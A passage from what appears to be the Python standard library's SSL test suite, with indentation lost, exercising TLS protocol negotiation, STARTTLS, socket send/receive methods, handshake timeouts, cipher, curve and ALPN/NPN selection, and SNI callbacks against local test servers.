try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@requires_tls_version('SSLv3')
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS,
False, client_options=ssl.OP_NO_SSLv2)
@requires_tls_version('TLSv1')
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@requires_tls_version('TLSv1_1')
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
@requires_tls_version('TLSv1_2')
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(True)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.options |= ssl.OP_NO_TLSv1_3
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
if IS_OPENSSL_1_1_1 and has_tls_version('TLSv1_3'):
self.assertEqual(s.version(), 'TLSv1.3')
elif ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
self.assertEqual(s.version(), 'TLSv1.2')
else: # 0.9.8 to 1.0.1
self.assertIn(s.version(), ('TLSv1', 'TLSv1.2'))
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@requires_tls_version('TLSv1_3')
def test_tls1_3(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
context.options |= (
ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
)
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@requires_minimum_version
@requires_tls_version('TLSv1_2')
def test_min_max_version_tlsv1_2(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
@requires_minimum_version
@requires_tls_version('TLSv1_1')
def test_min_max_version_tlsv1_1(self):
client_context, server_context, hostname = testing_context()
# client 1.0 to 1.2, server 1.0 to 1.1
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
@requires_minimum_version
@requires_tls_version('TLSv1_2')
def test_min_max_version_mismatch(self):
client_context, server_context, hostname = testing_context()
# client 1.0, server 1.2 (mismatch)
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
client_context.maximum_version = ssl.TLSVersion.TLSv1
client_context.minimum_version = ssl.TLSVersion.TLSv1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@requires_minimum_version
@requires_tls_version('SSLv3')
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
context.options |= ssl.OP_NO_TLSv1_3
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.options |= ssl.OP_NO_TLSv1_3
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.options |= ssl.OP_NO_TLSv1_3
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
@unittest.skipUnless(HAVE_SECP_CURVES, "needs secp384r1 curve support")
@unittest.skipIf(IS_OPENSSL_1_1_1, "TODO: Test doesn't work on 1.1.1")
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
try:
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
except ssl.SSLError:
pass
else:
# OpenSSL 1.0.2 does not fail although it should.
if IS_OPENSSL_1_1_0:
self.fail("mismatch curve did not fail")
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1_0
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_npn_protocols(server_protocols)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
